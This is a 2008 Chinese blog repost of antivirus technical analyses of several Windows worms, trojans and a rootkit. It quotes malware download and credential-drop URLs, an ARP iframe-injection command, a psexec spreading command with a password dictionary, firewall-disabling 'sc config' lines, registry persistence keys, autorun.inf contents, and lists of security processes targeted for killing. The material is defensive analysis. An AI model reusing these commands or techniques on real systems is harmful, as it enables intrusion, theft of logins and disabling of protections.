| << 2008年 >> << 8月 >> |
| 日 | 一 | 二 | 三 | 四 | 五 | 六 |
| 1 | 2 | |||||
| 3 | 4 | 5 | 6 | 7 | 8 | 9 |
| 10 | 11 | 12 | 13 | 14 | 15 | 16 |
| 17 | 18 | 19 | 20 | 21 | 22 | 23 |
| 24 | 25 | 26 | 27 | 28 | 29 | 30 |
| 31 |
最新评论
最热文章
统计信息
目前等级:
可用积分:5127
总访问量:143367
注册时间:2007-07-02
上次登录:2008-08-28
最近访客
judgechow
2008-08-25
2008-08-25
lv_lyffrank
2008-08-24
2008-08-24
风萧萧
2008-08-21
2008-08-21
指导员
2008-08-06
2008-08-06
铎宝
2008-08-06
2008-08-06
全部
| 沙坑 (1)
| 时不我待 (1)
| 自信 (1)
| 晴朗 (1)
| 自我 (1)
| 现实 (1)
| 生活 (1)
| 踏实工作 (1)
| 提醒自己 (1)
| 新鲜开始 (1)
看看病毒技术分析报告,为了更好的预防病毒 [转载] [2008-1-10]
“网页病毒下载器”病毒技术细节
这个是一个蠕虫型病毒,通过枚举局域网地址、获取被感染者当前的连接、下载ip地址信息的方式获取ip地址,并对这些地址尝试进行传播。病毒同时下载程序进行运行。病毒由VC6语言编写,加壳保护。
1、检查运行状态:
病毒运行后首先检测自己的是否是以“%system32%\IME\svchost.exe”运行,如不是则进行复制自己等初始化操作,反之则以服务方式运行。
2、初始化操作:
病毒删除“%system32%\IME\svchost.exe”,然后复制自己为该文件,并将属性设置为系统、隐藏,然后病毒调用CreateProcessA启动“%system32%\IME\svchost.exe”。
病毒启动“%system32%\IME\svchost.exe”后,释放批处理文件rs.bat并执行,以此来删除自己。
3、注册为服务运行:
病毒通过调用StartServiceCtrlDispatcher、CreateServiceA等函数,注册名称为“Alerter COM+”、目标为“%system32%\IME\svchost.exe”的服务,然后调用StartServiceA启动服务。
4、病毒的服务过程
病毒调用CreateMutexA尝试生成名为“"Alerter COM+”的互斥量,如失败则退出,以此来保证只有一个服务实例在运行。
病毒启动4个工作线程尝试进行网络传播和下载(详细见后面)。
病毒根据标志决定是否对本地固定逻辑盘建立AutoRun机制(详细见后面)。
病毒注册并生成窗口类名为“WebDown”、窗口名为“Alerter COM+”的隐藏窗口,并启动消息循环,然后向该窗口发送WM_DEVICECHANGE消息。
5、在固定磁盘中建立AutoRun实现自启动:
病毒根据标志(写在病毒内,推测为生成病毒时设置的)决定是否对固定硬盘建立自动运行机制。
如标志为建立,病毒对c到z逻辑盘调用GetDriveTypeA ,对类型为DRIVE_FIXED的固定逻辑盘建立自动运行机制。
病毒复制自己到该逻辑盘根目录下,名称为“setup.exe”,并生成AutoRun.inf文件以达到自动运行,病毒将setup.exe和AutoRun.inf的文件属性设置为系统和隐藏。
6、窗口消息处理:
在窗口循环中,病毒处理如下消息:
WM_CLOSE、WM_DESTROY消息,病毒调用默认窗口处理过程。
WM_CREATE消息,在窗口生成的时候,病毒调用SetTimer建立两个Timer,间隔为1秒和20分钟,回调方式为接收WM_TIMER消息。
WM_TIMER消息,病毒没隔1秒调用破坏反病毒软件和复制自己的代码(详细见后面),每隔20分钟尝试下载http://www. XXXXX.cn/jj/svch0st.exe为本地%system32%\down.exe并运行。
WM_DEVICECHANGE消息,病毒通过处理该消息得到新插入的可移动设备,并对该设备进行感染(写入病毒并建立AutoRun机制)。
7、破坏反病毒软件和复写文件:
病毒在通过处理WM_TIMER消息,每隔1秒检测并破坏反病毒软件。病毒通过调用GetCursorPos、WindowFromPoint、GetParent等函数获取当前光标下的窗口及其顶层父窗口,检测其窗口标题中是否是或包含如下内容:
Windows 任务管理器、安全卫士、扫描、专杀、注册表、Process、进程、木马、防御、防火墙、病毒、检测、Firewall、virus、anti、金山、江民、卡巴斯基、worm、杀毒
如包含这些内容,病毒通过向其发送WM_DESTROY、WM_CLOSE消息来破坏这些窗口,以此来破坏反病毒软件的运行。
病毒通过处理WM_TIMER消息,每隔1秒复制自己并复写注册表,以保护自己。病毒将自己复制为%system32%下的internt.exe和progmon.exe,并写入如下注册表信息:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\Advanced\Folder\Hidden\SHOWALL "CheckedValue" = 0X00000000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Internt" = %SYSTEM%\INTERNT.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Program file" = %SYSTEM%\PROGMON.EXE
工作线程1:
病毒尝试下载http://www.XXXXX.cn/jj/conn.exe为本地%system32%\BindF.exe并运行。
工作线程2:
病毒从http://www. XXXXX.cn/jj/下载如下文件到%system32%\目录:
ArpW.exe、nogui.exe、wpcap.dll、packet.dll、wanpacket.dll、arp.exe
病毒获取当前网段(例如193.168.0.55),并将最后一个字段替换为%s2-%s255,然后以如下参数启动ArpW.exe。
“ArpW.exe -idx 0 -ip 193.168.0.2-255 -port 80 -insert "<iframe src='http://www.1988712.cn/jj/index.htm' width=0 height=0>"”
病毒通过下载的Arp欺骗病毒,将代码插入局域网中的http包中。
工作线程3:
病毒从病毒从http://www. XXXXX.cn/jj/下载psexec.exe和server.exe到本地%system32%目录。
在此线程中,病毒每隔30分钟循环执行如下代码感染网络:
(1)感染局域网计算机。病毒获取本机ip后以此遍历局域网,通过自带的用户名和密码字典(见后面)尝试将psexec.exe和server.exe写入局域网中其它计算机的%system32%目录,然后以如下命令行启动psexec.exe。
"%system32%\psexec.exe \\192.168.0.2 -u 用户名 -p "密码" -c %system32%\servrr.exe -d"
(2)感染指定ip的计算机。病毒下载"http://union.itlearner.com/ip/getip.asp",并通过在其中搜索“input name=\"ip\”来获取ip地址,然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。
(3)感染当前连接的计算机。病毒通过调用GetTcpTable、GetUdpTable等函数获取当前连接的计算机的ip地址,然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。
用户名和密码字典如下:
用户名:administrator、admin、guest、alex、home、love、user、game、movie、time、yeah、money、xpuser
密码:NULL、password、123456、qwerty、abc123、memory、12345678、88888、5201314、1314520、asdfgh、angel、asdf、baby、woaini
工作线程4:
病毒每隔1秒,循环尝试下载http://www. XXXXX.cn/jj/svch0st.exe到本机%system32%并运行。
8、病毒的感染代码:
在病毒体中包含了感染代码,但病毒本身并未调用。该感染代码中存在api地址硬编码等问题,在运行时会出现问题。
在感染代码中保护如下操作:
病毒首先复制自己为%system32\drivers\svchost.exe。
病毒将自己复制到如下目录,名称为随机文件名.exe:
%system32\drivers\、%system32\dllcache\、%system32\IME\
c:\Program Files\Common Files\Microsoft Shared\、
c:\Program Files\Internet Explorer\Connection Wizard\、
c:\Program Files\Windows Media Player\、
c:\WINDOWS\addins\、
c:\WINDOWS\system\
病毒遍历c到z的逻辑盘,对所有目录进行感染,但排除保护如下字符串的目录:
Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、ComPlus Applications;Messenger、WINNT、Documents and Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、Messenger、Microsoft Frontpage、Movie Maker、WINDOWS。
病毒只感染后缀名为exe的pe可执行文件,感染时病毒在被感染文件的代码节的最后的内容为0的地方(为文件对齐补的)写入病毒代码,并将pe头中入口点改为指向病毒代码。
在感染的病毒代码中,病毒调用CreateProcessA(该函数地址为感染时写入的硬编码)启动“C:\WINDOWS\system32\drivers\mmaou.exe”(感染时写入,文件为感染时复制的病毒本身),然后通过记录的原入口点跳回原程序正常入口点执行。
“VB破坏者变种N”病毒技术细节
病毒运行后首先把自己复制到System32文件夹下,添加以下注册表值实现自启动:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run
Winstary = C:\WINDOWS\system32\SDGames.exe
HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows
load = C:\WINDOWS\system32\SDGames.exe
run = C:\WINDOWS\system32\SDGames.exe
执行以下CMD命令实现关闭防火墙等功能
sc config winmgmt start= AUTO & net start winmgmt & quit
sc config lanmanserver start= AUTO & net start lanmanserver & quit
sc config Alg Start= disabled & net stop Alg
sc config sharedaccess Start= disabled & net stop sharedaccess
释放脚本文件Taskeep.vbs,该脚本每隔2秒查找进程中是否存在病毒进程,如果没有则重新运行病毒程序.查找网络共享磁盘,如果找到把自己复制到该文件夹命名为xcopy.exe添autorun.inf文件使得用户打开磁盘时同时运行病毒。释放netshare.cmd文件,把用户所有磁盘都改为共享磁盘。遍历本机的脚本文件和可执行文件,对于脚本文件,在其后面添加以下代码src="http://zhidaobaidu.10mb.cn/",使得用户运行脚本时打开该网页;对于可执行文件,病毒会把自己覆盖到正常文件,使得正常可执行文件被破坏。病毒会把自己复制到本地所有磁盘中,添autorun.inf文件使得用户打开磁盘时同时运行病毒。从http://coolkiller.go1.icpcn.com/QQ.gif下载病毒程序。把系统时间的年份改为2030年,使得卡巴斯基杀毒软件失效.
然后修改以下注册表键值实现禁用注册表编辑器、任务管理器等功能
HKEY_CLASSES_ROOT\txtfile\shell\open\
Command = C:\WINDOWS\system32\SDGames.exe
HKEY_CLASSES_ROOT\regfile\shell\open\
Command = C:\WINDOWS\system32\SDGames.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
start page = wangma
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
start page = http://www.zhidaobaidu.10mb.cn/
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
default_page_url = wangma
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
default_page_url = wangma
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\policies\system
disabletaskmgr = 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\policies\system
disableregistrytools = 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Policies\Explorer
nosettaskbar = 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HideFileExt = 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Hidden = 2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\Folder\Hidden\SHOWALL
CheckedValue = 0
然后修改以下注册表键值实现镜像劫持,使得用户运行以下程序时都会运行病毒程序:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\360rpt.exe\
Debugger = C:\WINDOWS\system32\SDGames.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\Trojanwall.exe\
Debugger = C:\WINDOWS\system32\SDGames.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\KvReport.kxp\
Debugger = C:\WINDOWS\system32\SDGames.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\QQ.exe\
Debugger = C:\WINDOWS\system32\SDGames.exe
最后释放Avpser.cmd文件,该程序遍历进程查找进程中是否存在以下反病毒软件进程,如果存在则结束该进程:
RavMonD.exe RavStub.exe avp.exe 360safe.exe
“自动运行蠕虫变种JPH ”病毒技术细节
此程序为Worm类型程序
1.病毒自复制:病毒运行后复制自身到%system%目录,命名为cross.exe。
2.开机自启动:病毒通过函数WinExec调用系统注册表工具reg.exe修改注册表实现开机自启动。修改的键值如下:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
“crsss”=%system%\cross.exe
3.可移动磁盘传播:该病毒会向磁盘根目录写入自身命名为TNT.Exe和与之对应的Autorun.inf文件,Autorun.inf文件的内容如下:
[AuToRun]
open=TNT.Exe
shell\open=打开(&O)
shell\open\Command=TNT.Exe
shell\open\Default=1
当用户打开磁盘会运行该病毒文件
4.下载可疑文件:该病毒调用URLDownloadToFile下载http://n.XXXX.com/xx.dll保存到%system%\xx.dll。
5.浏览指定网页:调用CreateProcess创建iexplore.exe进程,后台浏览如下网页。
http:// XXXX.com/xx/TJ.ASP
http://n. XXXX.com/xx.htm
“传奇终结者变种YZM ”病毒技术细节
这是一个C语言编写的病毒,病毒主要功能为窃取游戏《传奇》的用户登陆信息;病毒在被感染的系统上以隐蔽的方式运行,用户无法通过正常的方法禁止其运行并清除该病毒文件。该病毒通过主文件释放动态库和配置文件,通过驻入动态库实现窃取用户游戏登陆信息。
病毒主文件的分析如下:
1.初始化:调用LoadLibraryA加载kernel32.dll,user32.dll,获取ExitProcess的函数地址。
2.病毒运行后会创建副本以及释放动态库文件到本地系统的指定目录。
%WINNT%\Fonts\gjcuaxw.fon
%System%\gjcscyc.dll
%System%\gjcsczc.exe
%WINNT%\Fonts\gjcscss.dll
(1)gjcsczc.exe为病毒文件存放到系统中的文件副本。病毒会查找%System%目录下是否存在文件名为gjcsczc.exe的文件,如果有会将其属性设置为Normal后删除该文件,然后将病毒文件以此名称复制到该目录下。
(2)gjcscyc.dll为病毒释放的动态库文件,病毒放出该动态库后会将该文件属性设置为SYSTEM、HIDDEN。
(3)gjcuaxw.fon和gjcscss.dll为配置文件,用于存放病毒通信地址,病毒通过调用WritePrivateProfileString分别向生成文件gjcuaxw.fon和gjcscss.dll中写入如下内容:
[Send]
Url1=12E4F8F8FCB6A3A3FBFBFBA2FBEFBEBCBCB5A2EFE2A3EAE0F5BEBCBDBCA3FBFFE1A2EDFFFC
[Send]
Url1=http://www.xxxxxx.cn/fly2010/wsm.asp;
3.修改注册表项,实现病毒文件动态库的开机加载。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
\ShellExecuteHooks"{3FA10261-B890-F432-A453-69F1023513F3}" = GJCSCYC.DLL
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{3FA10261-B890-F432-A453-69F1023513F3}
4.病毒会将%System%\gjcsczc.exe文件运行起来,然后以原病毒文件名为参数在C盘根目录下构造文件名为DFD开头的脚本文件,然后运行该脚本实现病毒原文件的自删除,以及该脚本文件的自删除功能。
5.病毒会比较系统中是否存在woool.dat的游戏进程,如果存在则结束其进程。使得用户需要重新登陆游戏,方便实现病毒动态库文件的驻入。
6.病毒会将释放出的动态库sidjhzy.dll加载起来,然后起线程调用动态库中的EnHookWindow函数实现挂消息钩子,在接收消息钩子的进程中加载病毒动态库的功能。
病毒动态库的分析如下:
病毒加载并起线程调用动态库中的EnHookWindow函数实现挂消息钩子,在接收消息钩子的进程中加载该病毒动态库实现其窃取用户登录信息的主要功能。sidjhzy.dll的具体功能如下:
1.病毒会通过挂键盘和鼠标的钩子将动态库文件驻入到接收键盘和鼠标消息的进程中。
2.病毒会结束TQAT.exe(反外挂软件)进程。
3.病毒会起专门的线程,通过修改游戏代码,直接在内存中读取指定数据,获取用户的游戏登陆信息,通过HTTP方式发送到木马散播者的指定的URL。
4.病毒会添加或修改如下注册项,破坏系统的安全设置(禁用Windows自动更新、禁用防火墙的功能):
HKEY_LOCAL_MACHINE\ SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
NoAutoUpdate = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters
\FirewallPolicy\Standard Profile Enable Firewall = 0
“梅勒斯下载器变种KO”病毒技术细节
病毒运行后首先会判断System32路径下是否有TxoMoU.Exe这个文件,如果有则调用WinExex函数运行该程序,然后释放与病毒文件同名bat把自己删除。
如果没有首先创建一个名为sos的互斥体防止进程有多个病毒实例运行。
然后把自己复制到System32路径下命名为TxoMoU.Exe,添加以下注册表项实现自启动:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\crsss =
"C:\WINDOWS\system32\TxoMoU.Exe
然后病毒修改以下注册表项实现不显示隐藏文件、禁用任务管理器、禁止Windows升级功能:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate\
DisableWindowsUpdateAccess = 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\
DisableTaskMgr = 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
HideFileExt = 1
HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced\
Hidden = 0
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
ShowSuperHidden = 0
每隔1分钟从以下网址下载病毒程序:
http://sss.xxxxxx.com/url.txt
http://sss.xxxxxx.com/IE.txt
每隔1秒查找360安全卫士进程,如果找到则结束该进程。修改系统时间为2000年,使得卡巴斯基杀毒软件失效。病毒每隔0.2秒把自己复制到本地所有磁盘中,添autorun.inf文件使得用户打开磁盘时同时运行病毒。最后病毒每隔5秒进行以下操作:
查找有以下字符串的窗口并发送WM_CLOSE消息关闭该窗口: 检测、木马、病毒。修改以下注册表键值使得修改IE主页失效。
HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\
HomePage = 1
删除用户系统中所有的.GHO文件。
“刀剑Online木马”病毒技术细节
该病毒主要功能为窃取游戏《刀剑Online》的用户密码;病毒在被感染的系统上以隐蔽的方式运行,用户无法通过正常的方法禁止其运行。
1.病毒运行后会将病毒创建副本以及释放动态库文件到本地系统中的指定位置,放出文件后执行脚本文件会将自身删除:
%WinNT%\Fonts\cadaafx.fon
%System%\sidjhzy.dll
%System%\sidjhaz.exe
%WinNT%\Fonts\sidjhcsa.dll
其中sidjhzy.dll为病毒释放的动态库文件,病毒将加载此动态库实现主要功能; cadaafx.fon和sidjhcsa.dll为配置文件,存放病毒通信地址;病毒会将idjhzy.dll的属性设置为系统隐藏, sidjhcsa.dll的文件属性设置为Normal。病毒会放出文件名以DFD开头的脚本文件,病毒运行后会调用脚本实现病毒原文件的自删除,删除后,脚本文件会自动删除本身。
2.病毒的主要功能通过加载其释放出的动态库sidjhzy.dll实现,其动态库文件的具体功能如下:
(1)病毒会通过挂键盘和鼠标的钩子将动态库文件驻入到接收键盘和鼠标消息的进程中。
(2)病毒会结束TQAT.exe(反外挂软件)进程。
(3)病毒会结束游戏进程BO.EXE使得用户重新登陆偷取用户登陆信息。
(4)病毒将起线程直接到内存中读取指定数据,获取用户的信息,通过HTTP方式发送到木马散播者的设定的URL---Http://www.XXXXXX.cn/xk4/post.asp中。
(5)病毒会添加或修改如下注册项,破坏系统的安全设置(禁用Windows自动更新、禁用防火墙的功能):
HKEY_LOCAL_MACHINE\ SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
NoAutoUpdate = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters
\FirewallPolicy\ Standard Profile
Enable Firewall = 0
添加如下注册表项实现病毒DLL的注入:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
"AppInit_DLLs" = SIDJHZY.DLL HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
\ShellExecuteHooks"{88847374-8323-FADC-B443-4732ABCD3788}" = SIDJHZY.DLL
“BAT代理蠕虫变种C”病毒技术细节
病毒运行后首先会把自己复制到System32目录下,然后创建一个与自己同名的VBS脚本,该脚本用来启动病毒程序,然后把这个脚本复制到C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录下实现自启动。
VBS的内容为:
wscript.createobject("wscript.shell").run """qq.bat"" /start",0
查找网络共享文件夹,如果找到就把自己拷到该文件夹中并添加autorun.inf和病毒的同名VBS脚本使得用户打开该文件夹时同时运行病毒。
把自己复制到本地所有磁盘中,添autorun.inf文件和病毒的同名VBS脚本使得用户打开磁盘时同时运行病毒。
autorun.inf的内容为:
open=wscript.exe qq.vbe
shell\open\Command=wscript.exe qq.vbe
shell\explore\Command=wscript.exe qq.vbe
shell\find\Command=wscript.exe qq.vbe
删除各个磁盘下的U盘保护程序,如:Anti-U盘免疫.bat、U盘病毒分析.bat。
在系统盘下生成名为“已经被反U盘病毒的“病毒”感染.txt”的文件文件,提示用户已经中毒。
最后病毒会每隔10秒通过cmd.exe启动自己,使得用户无法通过删除文件来清除病毒。
“下载者蠕虫变种N”病毒技术细节
被感染的正常文件(暂时没有截获感染源样本),感染代码进行下载并运行,但不感染其它文件。
感染方法:
病毒感染文件时,在被感染文件最后新增一个大小为0x1FE大小的节并将病毒体写入。
病毒体将被感染文件的原入口点保存在最后一个节的开始处,并将PE结构中的入口点修改为指向病毒体(最后一个节)的偏移0xC1处。
感染的代码:
1、定位Kernel32.dll基址
病毒在程序入口处获取堆栈顶的值(位于Kernel32.dll内存空间),然后利用这个值按页对齐大小向前搜索,通过搜索PE文件标志“MZ”的方式获取Kernel32.dll的基址。
2、获取API
病毒获取Kernel32.dll基址后,从基址开始搜索字符串“GetProcAddress”,以此定位该函数的导出地址。获取GetProcAddress函数地址后,病毒调用该函数获取如下函数地址并保存:ExitProcess、CreateThread、WinExec、LoadLibraryA
3、启动下载线程:
病毒调用CreateThread启动下载线程,下载线程的地址在病毒体偏移0x1A8处。
4、下载线程:
病毒调用LoadLibraryA加载Urlmon并获取URLDownloadToFileA函数的地址,然后调用URLDownloadToFileA尝试下载"http://usd.88xxx.net/down/n.exe"为"C:\Program Files\svchost.exe",如果下载成功,病毒调用WinExec执行该文件。
5、返回入口点:
启动下载线程后,病毒通过保存在病毒体偏移0处的原程序入口点地址返回正常执行文件。
“征途木马变种YMF”病毒技术细节
这是一个偷取网络游戏"征途"相关信息的木马程序
该病毒分为两部分:EXE部分负责关闭相关杀毒软件,修改注册表自启动,释放DLL并注库.DLL部分负责具体的偷取过程,自我保护等.
一,EXE部分:
病毒运行后先使用OpenEvent打开一个"ZHGHAKUIQIQOSWW_ZT"的事件,如果打开成功,则直接退出,如果没有该事件,则使用CreateEvent创建该事件,以便保证在当前系统内只有一个实例在运行.
病毒使用Process32First,Process32Next遍历系统进程,查找"Twister.exe(费尔杀毒软件进程)","FilMsg.exe"一旦发现该进程存在系统中,则使用OpenProcess,TerminateProcess关掉该进程.
病毒使用CreateThread创建两个线程.
线程一:遍历进程,一旦发现进程中存在"RavMon.exe(瑞星杀毒软件进程)",使用OpenProcess打开该进程,使用Thread32First,Thread32Next遍历该进程中的线程,在EnumThreadWindows的CallBack函数中使用PostMessage向该进程发送WM_Command消息,关闭瑞星杀毒软件.
线程二:使用FindWindow查找AVP.AlertDialog和AVP.Product_Notification窗口,如果发现窗口存在,则向"允许"和"跳过"两个Button上使用SendMessage发送WM_LBUTTONUP和WM_LBUTTONDOWN消息.则AVP杀毒软件的预警系统失效.
病毒使用GetSystemDirectory得到%SYSTEM32%目录,从自身资源中释放出DLL并复制到%SYSTEM32%目录命名为55550.dll,再使用LoadLibrary加载该DLL.
至此,EXE工作结束.
二,DLL部分:
病毒遍历进程查找"zhengtu.dat"当发现该进程时,病毒使用ReadProcessMemory从游戏进程中读取所需的信息,再发送到指定的网址上,
http://pt.xx.vc/ok/zt/lin.asp
病毒会使用WriteProcessMemory往explorer.exe进程中注入一段远程代码,该代码的作用就是循环查找%SYSTEM32%目录中的55550.dll是否存在,如果发现病毒DLL文件已经不存在,则重新写入一个新的DLL进去,达到自我保护的目的.
“天龙八部木马变种JKG”病毒技术细节
病毒运行后首先会找到System32路径下的kernel32.dll并试图删除该动态库,如果删除成功则退出。
如果没有成功则每隔15遍历进程查找进程中是否存在卡巴斯基反病毒软件进程avp.exe,如果存在则把当前系统时间的年份改为2007,试图使该软件失效。
然后在System32路径下释放两个动态库文件qdshm.dll和addrtlhelp.dll。
然后遍历进程查找进程中是否有游戏进程Game.exe,如果存在则结束该进程,当用户再次启动游戏进程时把动态库通过远程线程注到游戏进程中;如果不存在则调用LoadLibrary 函数把动态库加载起来。
最后病毒运行完后会把自己删除。
qdshm.dll用来加载其他动态库:
动态库被加载起来后首先会找到System32路径下的kernel32.dll并试图删除该动态库,如果删除成功则退出。
如果没有成功则根据自己所在进程进行不同操作:
1)如果是svchost.exe或者alg.exe进程则退出。
2)如果是Explorer.exe则调用OpenProcessToken、LookupPrivilegeValue、
AdjustTokenPrivileges函数提升自己权限,调用LoadLibrary 函数把qdshm.dll、mszs.dll两个动态库加载起来。
3)如果是其他进程则起一个线程每隔1秒从System32路径下加载各类偷密码的动态库具体如下:
C:\WINDOWS\system32\SHQZatl.dll、C:\WINDOWS\system32\LRTWatl.dll、
C:\WINDOWS\system32\GZGDatl.dll、C:\WINDOWS\system32\GFSJatl.dll…addrtlhelp.dll盗取并发送用户帐号密码
该动态库被加载起来后首先会找到System32路径下的kernel32.dll并试图删除该动态库,如果删除成功则退出。
如果没有成功则查看加载自己的进程,如果是Explorer.exe则起一个线程调用SetWindowsHookEx函数挂接鼠标键盘钩子并创建一个名为__D_的互斥体;如果是游戏进程则查找游戏登陆窗口TianLongBaBu WndClass,记录用户输入的帐户密码并发送到指定地址http://www.ccjj68.cn/yctl200/lin.asp
“反病毒杀手Rootkit”病毒技术细节
此病毒是一个Rootkit病毒,由C语言编写的驱动程序,提供破坏杀毒软件的功能。
1、禁止反病毒软件的运行:
病毒调用PsSetLoadImageNotifyRoutine函数注册镜像加载的通知例程,在通知例程中,病毒首先比较加载的镜像的名称是否包含下名称:
vsdatant.sys,watchdog.sys,zclient.exe,bcfilter.sys,bcftdi.sys,bc_hassh_f.sys,
bc_ip_f.sys,bc_ngn.sys,bc_pat_f.sys,bc_prt_f.sys,bc_tdi_f.sys,filtnt.sys,
sandbox.sys,mpfirewall.sys,msssrv.exe,mcshield.exe,fsbl.exe,avz.exe,
avp.exe,avpm.exe,kav.exe,kavss.exe,kavsvc.exe,klswd.exe,ccapp.exe,
ccevtmgr.exe,ccpxysvc.exe,iao.exe,issvc.exe,rtvscan.exe,savscan.exe,bdss.exe,
bdmcon.exe,livesrv.exe,cclaw.exe,fsav32.exe,fsm32.exe,gcasserv.exe,icmon.exe,
inetupd.exe,nod32krn.exe,nod32ra.exe,pavfnsvr.exe,Windows-KB890830-V1.32.exe
对于包含上名称的镜像,病毒检查其是否是有效的PE文件,如是则调用ZwOpenProcess、ZwTerminateProcess函数禁止其运行,以此来禁止反病毒软件、防火墙等安全软件的运行。
2、挂接API:
病毒通过修改cr0寄存器标志位的方法关闭写保护,然后替换KeServiceDescriptorTable中的函数地址来Hook API,并记下原函数的地址。病毒挂接了如下两个API:
ZwQueryDirectoryFile
ZwEnumerateValueKey
3、ZwQueryDirectoryFile钩子过程:
在这个钩子过程中,病毒调用记录的原函数地址调用ZwQueryDirectoryFile函数,然后比较得到的目录、文件名中是否包含"kernelw"字符串,如果包含将返回STATUS_NO_MORE_FILES,反之,将正常的结果返回。
病毒通过挂钩ZwQueryDirectoryFile来隐藏包含有"kernelw"名称的目录或文件,以此来保护自己。
4、ZwEnumerateValueKey钩子例程:
在这个钩子过程中,病毒调用记录的原函数地址调用ZwEnumerateValueKey函数,然后比较得到的节果中的键值是否包含"kernelw"字符串,如果包含则返回错误,反之,将正常的结果返回。
病毒通过挂钩ZwEnumerateValueKey来隐藏键值包含有"kernelw"名称键值,以此来保护自己。
5、钩子保护线程:
病毒通过调用PsCreateSystemThread启动一个新的线程,在这个线程中不断循环检测KeServiceDescriptorTable表中自己挂钩的ZwQueryDirectoryFile、ZwEnumerateValueKey的地址是否被改变,如被改变则再次挂接这两个函数。
6、锁定ntoskrnl.exe文件
病毒通过调用ZwCreateFile、NtLockFile方式锁定ntoskrnl.exe文件,以此来防止其它程序通过读取ntoskrnl.exe中的数据恢复KeServiceDescriptorTable,以此来保护自己的API钩子。
“反病毒终结者变种N”病毒技术细节
1、病毒运行后,会在system32目录下释放一个OCX文件,文件名随机。
病毒生成文件名的方法:用GetLocalTime得到当前系统时间,以月份跟得到的秒数为文件名,扩展名为.OCX。
我们在分析的时候得到的是12月7秒,文件名为:127.OCX。
2、利用rundll32.exe来加载自己释放的文件。并把rundll32.exe %system32%127.ocx加入到启动项。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
Load = rundll32.exe %sysetm32%127.ocx
3、等1.5秒后把自己删除。
病毒自删除方法比较特别,先用DeleteFileA去检查病毒本身是否已被删除,然后用MoetFile把自己移动到回收站,在用MoveFile把回收站中的病毒文件加入到重启后删除列表中。
4、OCX文件加载成功后,病毒利用全局钩子,在每一个进程中插入一个127.ocx。
(1)HOOK个每个进程中的API来隐藏自己
HOOK的API有
RegOpenKeyExA
CreateFileA
CreateFileW
RegEnumValueA
RegEnumValueW
从HOOK的API可以看出,用户是无法在正常方式下,查看到病毒的文件,和在注册表中加入的内容。
(2)对AVP杀软的情况,病毒使用的手法:
当检查到系统中是否AVP的进程时,把当前系统的时间修改为:现在的时间减去10年
如:现在是2007 被病毒改后,就会是1997年,这样会使AVP失效。
(3)对于一些反流氓软件的情况,病毒使用的手法:
当有程序要运行时,病毒会检查当前运行的文件名含有以下列表中的文件时,会把当前运行文件的里程结束,并且把文件移动到Windwos的TEMP目录下改名__.%s.tmp。
病毒会遍历指定的目录下去查找下面文件,当查找到文件后,会把文件移动到TEMP目录下改名为__%s.tmp.
病毒查找的文件有:
mmskskin.dll
KKClean.dll
VirUnk.def
ntiActi.dll
Rsaupd.exe
Iereset.dll
KASearch.DLL
KAVBootC.sys
Ras. exe
iehelp.exe
trojandetector.exe
KAConfig.DLL
KAVPassp.DLL
hsfw.dll
ollydbg.ini
Libclsid.dat
KNetWch.SYS
CleanHis.dll
WoptiClean.sys
kakalib.def
libdll.dat
kkinst.ini
wopticlean
360safe
(4)对于其它杀软件的处理
遍历文件时,同时获得文件的版本信息,当发现下列住处时,会把文件删除
Kingsoft Antivirus
Kingsoft Antispyware
TrojanDetector
Micropoint
Kingsoft
Duba
4、修改文件的访问根权。
病毒利用cacls.exe Filename /T /E /C /P everyone:N的方式,把磁盘上文件设置为共享,让所有人可以使用文件。
